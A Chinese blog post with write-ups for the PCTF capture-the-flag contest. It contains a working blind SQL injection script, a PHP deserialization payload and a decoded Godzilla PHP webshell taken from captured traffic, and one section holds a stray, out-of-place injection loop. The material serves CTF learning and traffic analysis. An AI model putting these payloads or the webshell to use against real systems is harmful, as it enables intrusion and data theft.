PCTFWP

最新推荐文章于 2024-05-10 23:02:25 发布
最新推荐文章于 2024-05-10 23:02:25 发布
阅读量74 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73861475/article/details/134883827
版权

web

Sign In

查看源代码,访问提示文件就可得到flag

 easyupload

先上传一个图片马,会提示特洛伊文件,于是就改文件名,重新上传就可以得到flag

类似: [MoeCTF 2022]what are y0u uploading?

 先做我

?poc=a:1:{s:5:"admin";b:1;}

111z_sql 

查看源代码,发现copyright.php文件

进行测试发现,注入点为id

使用脚本就可以得到flag

import requests

url = "http://node6.anna.nssctf.cn:28960/copyright.php"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://node6.anna.nssctf.cn:28959",
    "Referer": "http://node6.anna.nssctf.cn:28959/"
}
# payload = "id=0'||if(ascii(substr((select%09database()),{},1))>{},1,0)#"
# payload = "id=0'||if(ascii(substr((select%09group_concat(table_name)from(information_schema.tables)where(table_schema=database())),{},1))>{},1,0)#"
# payload = "id=0'||if(ascii(substr((select%09group_concat(column_name)from(information_schema.columns)where(table_name='flag')),{},1))>{},1,0)#"
payload = "id=0'||if(ascii(substr((select%09group_concat(pctf)from(xitif_sql.flag)),{},1))>{},1,0)#"
flag =''
for i in range(1,100):
    high = 128
    low = 32
    mid = (high+low)//2
    while high>low:
        payload1 =payload.format(i,mid)
        response = requests.post(url=url, headers=headers, data=payload1)
        # print(response.text)
        # print(payload1)
        if "flag{fake_flag}"  in response.text:
            low = mid +1
        else:
            high = mid
        mid = (high+low)//2
    if chr(mid) == " ":
        break
    flag += chr(mid)
    print(flag)

reverse

文学ida与化学gdb

将下载好的附件用记事本打开搜索flag,就可以发现flag

baby_python

import base64
def decrypt(encoded_str):
    decoded_bytes=base64.b64decode(encoded_str)
    decoded_str = decoded_bytes.decode('utf-8')
    decrypted=[]
    for char in decoded_str:
        decrypted_char = chr(ord(char)^0x10)
        decrypted.append(decrypted_char)
    return ''.join(decrypted)
encrypted_string="dnxxd2tAaWR4X35PIWNPYnVxISEpT3l+ZHVidWNkWX53IWkxMTFt"
decrypted_result = decrypt(encrypted_string)
print(decrypted_result)

for i in range(0,50):
    for j in range(0,256):
        payload1 =payload.format(i,j)
        data = {
            "username": payload1,
            "password": "123"
        }
        request = requests.post(url, data)
        if "yes" in request.text:
            print(chr(j),end="")
print()
print(payload1)

upx

encode = [
    0xCC, 0x8D, 0x2C, 0xEC, 0x6F, 0x2F, 0x66, 0x6E, 0xEB, 0x2F,
    0x06, 0xAA, 0xEB, 0x6D, 0xC9, 0x06, 0xCE, 0xCE, 0xEB, 0xAA,
    0x0E, 0x0F, 0xEB, 0xEE, 0x66, 0x8D, 0x8D, 0x24, 0x24, 0x24,
    0xAF, 0x00
]

def ror(a1, a2):
    return ((a1 << a2) | (a1 >> (8 - a2))) & 0xFF

flag = []

for i in range(len(encode)):
    decrypted = chr(ror(encode[i], 3))
    flag.append(decrypted)

print("Decrypted flag: " + "".join(flag))

 密码

原神,启动!

百度提瓦特文字,对照着解码,再全部写成小写的就是flag

misc

cancanneed

kali虚拟机中binwalk提取图片中的信息检查就会发现flag

w3nx1z1去哪儿

百度搜图,查看位置

 Cyber_Master

将得到的字符串用base解密,得到新的字符串就接着解密

wyz大战哥斯拉

先url解码

eval(base64_decode(strrev(urldecode('=oQD9pQD9BCIgAiCN0HIgACIgACIgoQD7kSeltGJsEGdhRGJoUGZvNmbl1TXl1WYORWYvxWehBHJb50TJN1UFN1XkACIgACIgACIgACIgoQD7lSZzxWYm1TPhkiIvZmbJN3YpNXYCRXZnJCLhRXYkRCKz9GcyR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VWCJoQD9BCIgACIgACIK0wOpkXZrRCLkF2bslXYwRCKlR2bj5WZ9QWYvxWehBHJgACIgACIgACIgACIK0wepU2csFmZ90TPpIybm5WSzNWazFmQ0V2ZiwCZh9Gb5FGckgycvBnc0NHKgYWagACIgACIgAiCNsTK5V2akwSXl1WYORWYvxWehBHJb50TJN1UFN1XkgSZk92YuVWPkF2bslXYwRCIgACIgACIgoQD7lSKdVWbh5EZh9Gb5FGckslTPl0UTV0UfRCK0V2czlGKgYWagACIgoQD7kSeltGJskSXzNXYwRyWUN1TQ9FJoUGZvNWZk9FN2U2chJGKlR2bj5WZ9EGdhRGJgACIgoQD7lSKdN3chBHJbR1UPB1XkgCdlN3cphCImlmCNszJ0QDO0cjZlFjM2QGO0EjNycSP5V2akoQD7cCZh9Gb5FGcn0TZtFmTkF2bslXYwRiCNszJiN3J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD'))));&sb=Kbo8OGQ2MjFlZgK6CT/2AiZ3d2+bcvqh1CEyIz+jGi+8OyIyCtfce8crmeBswOvpl387hqMxPRLQR0bFbn5VFjuZOZZEW9gSOV9GqmU6ppKt7AQ8iHL0JikYjdG9iuTFCx3nEOrIAkee8ZKFruW/TILC8W0SI+nhuf305yOJC+scQ8J6AyGL6ch3y1WUEXKl3jaDhOIGrjFlZg==

倒序

 

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='sb';
$payloadName='payload';
$key='26148d621ef74844';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

有很长一段的数据,解密后就是下面的

$parameters=array();
$_SES=array();
function run($pms){
    global $ERRMSG;

    reDefSystemFunc();
    $_SES=&getSession();
    @session_start();
    $sessioId=md5(session_id());
    if (isset($_SESSION[$sessioId])){
        $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId)));
    }
    @session_write_close();

    if (canCallGzipDecode()==1&&@isGzipStream($pms)){
        $pms=gzdecode($pms);
    }
    formatParameter($pms);

    if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){
        @bypass_open_basedir();
    }

    if (function_existsEx("set_error_handler")){
        @set_error_handler("payloadErrorHandler");
    }
    if (function_existsEx("set_exception_handler")){
        @set_exception_handler("payloadExceptionHandler");
    }
    $result=@evalFunc();

大致看了下,就是获得zip流,然后解压啥啥的

解命令和结果的py

<?php
function encode($D,$K) {
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$String ='Kbo8OGQ2MjFlZlL5iT72Aiax1eixoTooX0wNDrDkYXaGoRFz3I2qcfdtwj7V76/vWcjzJ24IYJRETJKUmAq1BOay7nQzwZB71x5+aOWIzCIk/fjBj2xeXjwXQOJig4L+KPwcQ0crQEaamgz+HnJrXNWIpHyikR0FeZyhArq9f8MjTktNjRC8MWVm';
$key='26148d621ef74844';
$data=encode(base64_decode($String),$key);
file_put_contents('C:\Users\OHHHH\Desktop\py文件\flag2.txt', $data);
echo $data;

获得的结果,直接改后缀为zip,然后解压得到

 whoami

 dir

按照惯例,直接拉到最后一个,查看获得flag的值

 1z_gif

用网站工具分帧拼接,修复(补上三个角)

DynamiteLab – A Free Online PCAP File Viewer and Analyzer

 然后一扫

U2FsdGVkX1/Jnjw7kjk86/l86VHMyAu3l4UtTWLT/NTnMII6rmLIsitb/RJr0rUt
iw0mlEma4zdBD337n+RM+Q==

base64解密后,什么Salted

查询后,得知是AES或者Rabbit解密

但不知道密钥,又翻来翻去,知道了一个时间差的信息

去试试,2变0,3变1

 转换后为timeuse

 mobile

find_the_cat

将apk文件用notepad++打开,搜索flag,一直查看到两千多行就可以发现flag

 

正在努力中的小白♤
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
商米-android-使用NFC读IC卡,身份证云解和IC卡同时兼容
walle167的博客
05-07 454
云解身份证
android xml 定义渐变色背景
最新发布
dengfuma的专栏
05-11 311
android xml 定义渐变色背景
Android 适配阿拉伯语之vector图标镜像
SammeryD的博客
05-07 583
使用 android:autoMirrored=“true” 在 Vector Drawable 中是一种非常方便的方法,因为它允许你使用相同的 drawable 资源来适应不同的语言环境,而无需为 RTL 语言创建单独的版本。属性简单而直接的方法来自动处理 RTL 环境中图标的翻转。
Android 11 输入系统之InputDispatcher和应用窗口建立联系
littleyards的博客
05-09 1136
本文介绍InputDispatcher和客户端进程建立联系的过程,核心是通过socketpair产生两个fd
android基础-服务
娜娜子_的专栏
05-08 318
oncreate是服务第一次启动调用,onStartCommand是服务每次启动的时候调用,也就是说服务只要启动后就不会调用oncreate方法了。可以在myservice中的任何位置调用stopself方法让服务停止下来。同样使用intent来传递服务。
【北京迅为】《iTOP-3588开发板源码编译手册》-第4章 Android12/Linux设备树简介
BeiJingXunWei的博客
05-07 508
设备树是一种描述硬件的数据结构,很形象的来说,就像是树一样,把硬件描述了出来,如果我们需要修改节点,通过头文件一层一层地找节点即可。比如Linux源码默认设备树文件rk3588-evb7-lp4-v10-linux.dts中的头文件包括以下两个设备树,去到以下两个设备树中会看到它们头文件所包含的其他设备树文件,可以这样一层层的找需要修改的节点。【全套资料及网盘获取方式】联系淘宝客服加入售后技术支持群内下载。【内容来源】《iTOP-3588开发板源码编译手册》【实验平台】:迅为RK3588开发板。
Android OpenMAX(五)高通OMX Core实现
青山渺渺
05-08 163
高通OMX Core实现
uni-app安卓本地打包个推图标配置
李浩洋
05-07 267
uniapp安卓本地打包个推图标配置。如果什么都不配置,默认的就是个推小鲸鱼图标。
Android GPU渲染SurfaceFlinger合成RenderThread的dequeueBuffer/queueBuffer与fence机制(2)
Zhang Phil
05-10 691
t 时长,20s,20秒的trace文件。CPU返回后,会直接将GraphicBuffer提交给SurfaceFlinger,告诉SurfaceFlinger进行合成,但是这个时候GPU可能并未完成之前的图像渲染,这时候就牵扯到一个同步,Android中,用的是Fence机制,SurfaceFlinger合成前会查询Fence,如果GPU渲染没有结束,则等待GPU渲染结束,GPU结束后,会通知SurfaceFlinger进行合成,SF合成后,提交显示,最终完成图像的渲染显示。就是 Buffer。
WordPress原创插件:当日24小时发布文章标题变红
爱酷码的博客
05-07 321
WordPress原创插件:当日24小时发布文章标题变红。
Android中Fragment失去焦点的场景
振华OPPO的博客世界
05-08 440
所以,我们要在当下立刻行动,趁父母还健在,抓紧时间孝顺父母、陪伴父母,在物质上、精神上孝养父母。当Fragment所在的Activity开始与其他Activity进行交互时,例如按下Home键或其他Activity获得焦点,导致当前Activity失去焦点,从而使得所有关联的Fragment都进入暂停状态。当Activity切换到另一个配置,如横屏或纵屏切换,Activity会被销毁并重建,这个过程也会导致Fragment的。,之后Activity会重新创建,这时Fragment的。等方法会再次被调用。
Android中gradle.properties 和 gradle-wrapper.properties 作用
浅墨的博客
05-08 433
我们更深入地了解这两个文件的作用和它们可以包含的一些常见配置。
Android OpenMAX(四)OMX Core
青山渺渺
05-07 394
OMX Core解析
Php php7的特性
u010373106的博客
05-10 323
PHP7引入了Zend Engine 3.0,显著提高了执行效率,相比PHP 5.x,性能提升了2-3倍。这个特性无法直接通过代码示例展示,但你可以感受到在升级到PHP7后,相同代码的执行速度更快。PHP 7允许在需要时在代码中创建匿名类,而不必事先定义一个具名的类。允许在函数定义时声明返回值的类型,提高了代码的可读性和健壮性。简化了对变量是否为null的检查,提供了一个简洁的语法。用于比较两个值,返回-1、0或1,适用于排序函数。增加了过滤选项,可以在反序列化时提供安全性。
MySQL基本查询
Dirty_artist的博客
05-07 968
mysql crud基本操作
Android 屏幕适配全攻略(上)-掌握屏幕单位,应对千变万化的设备
w风雨无阻w的专栏
05-10 838
Android 设备中的分辨率指的是屏幕分辨率,即屏幕上可显示的像素数量,它决定了屏幕的显示质量。DPI 是一个表示图像分辨率的单位,它描述了每英寸图像中包含的像素或点的数量。色深越高,图像的色彩表现力就越强。通过这些转换函数,我们可以在不同的长度单位之间进行转换,确保在不同屏幕密度下,UI 元素的尺寸和字体大小保持一致。但在打印领域,DPI描述的是打印机的分辨率,而不是显示设备的分辨率。它是一个非常重要的显示技术指标,可以反映屏幕的清晰度和细腻程度,PPI 越高,屏幕显示的内容就越细腻清晰。
Android 编译文件简述(Android.bp)
weixin_35723192的博客
05-07 95
Android.bp文件是Android开源项目(AOSP)中用于构建Android系统的一种构建配置文件格式。与旧的Android.mk文件相比,Android.bp文件采用了更加现代化和模块化的方式来描述构建配置,具有更好的可读性和扩展性。Android.bp文件以模块为单位进行配置,每个模块描述了一个组件(如库、应用程序等)的构建规则。Android.bp文件采用声明式语法,使用一系列的属性来描述模块的属性和构建规则,而不是使用Makefile中的命令式语法。
Android之监控APP崩溃获取日志的方法,Bugly和其他方法
qq_46269365的博客
05-10 268
完整的集成步骤请参考光那个文档,
Android 蓝牙实战——蓝牙电话通话状态同步(二十四)
小旭的专栏
05-09 569
前面分析了蓝牙电话通话状态的广播,我们可以在蓝牙电话中实时监听蓝牙电话的状态,但如果是其他音乐类 APP 呢,在播放的时候也需要知道当前是否有通话正在进行,但是有完全没必要实时监听电话的状态,这就需要一个获取通话状态的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值